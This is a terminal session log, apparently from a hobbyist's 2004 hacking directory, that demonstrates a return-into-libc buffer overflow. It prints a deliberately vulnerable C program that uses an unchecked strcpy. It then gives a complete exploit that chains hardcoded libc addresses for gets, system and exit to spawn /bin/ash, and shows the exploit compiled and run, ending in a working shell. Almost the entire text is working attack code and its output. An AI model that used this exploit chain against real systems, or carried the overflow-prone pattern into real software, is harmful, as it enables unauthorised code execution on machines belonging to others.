user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$ ls hex2bin hex2bin.c retlibc.c vuln.c user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$ cat vuln.c #include int main (int argc, char **argv, char *env[]) { char buffer[500]; printf("called...\n"); if(argc > 1) { strcpy(buffer, argv[1]); } return 0; } user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$ gcc vuln.c -o vuln user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$ cat retlibc.c /** * Example of return into libc * * Kototama */ #include // all address were found with gdb // you could use dlsym too #define ADDR_SYSTEM 0x4005f630 #define ADDR_EXIT 0x4004a8b0 #define ADDR_BASH // base of libc + offset // found in /proc/pid/maps #define ADDR_POP1 0x4001f000 + 0x7bae5 #define ADDR_GETS 0x4007fd70 // address of the buffer in vuln.c #define ADDR_ARG_GETS 0xbffff854 #define STR_BASH "/bin/ash" #define VUL_PATH "./vuln" #define VUL "vuln" #define BUFSIZE 500 #define copy(array, index, int_value) *(int *) &array[index] = int_value int main (void) { char buffer[BUFSIZE + 10*4 + 1]; char *argv[] = {VUL, buffer, NULL}; char *env[] = {STR_BASH, NULL}; int addr_bash = 0xbffffffa - strlen(STR_BASH) - strlen(VUL_PATH); memset(buffer, 'B', BUFSIZE + 8*4 -2); buffer[BUFSIZE + 10*4 -1] = '\0'; copy(buffer, BUFSIZE + 4, ADDR_GETS); copy(buffer, BUFSIZE + 8, ADDR_POP1); copy(buffer, BUFSIZE + 12, ADDR_ARG_GETS); copy(buffer, BUFSIZE + 16, ADDR_SYSTEM); copy(buffer, BUFSIZE + 20, ADDR_POP1); copy(buffer, BUFSIZE + 24, ADDR_ARG_GETS); copy(buffer, BUFSIZE + 28, ADDR_EXIT); copy(buffer, BUFSIZE + 32, 0xbbbbbbbb); copy(buffer, BUFSIZE + 36, 0); execve(VUL_PATH, argv, env); return 0; } user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$ gcc retlibc.c -o retlibc user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$ ./retlibc called... date Sat May 29 22:32:59 CEST 2004 user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$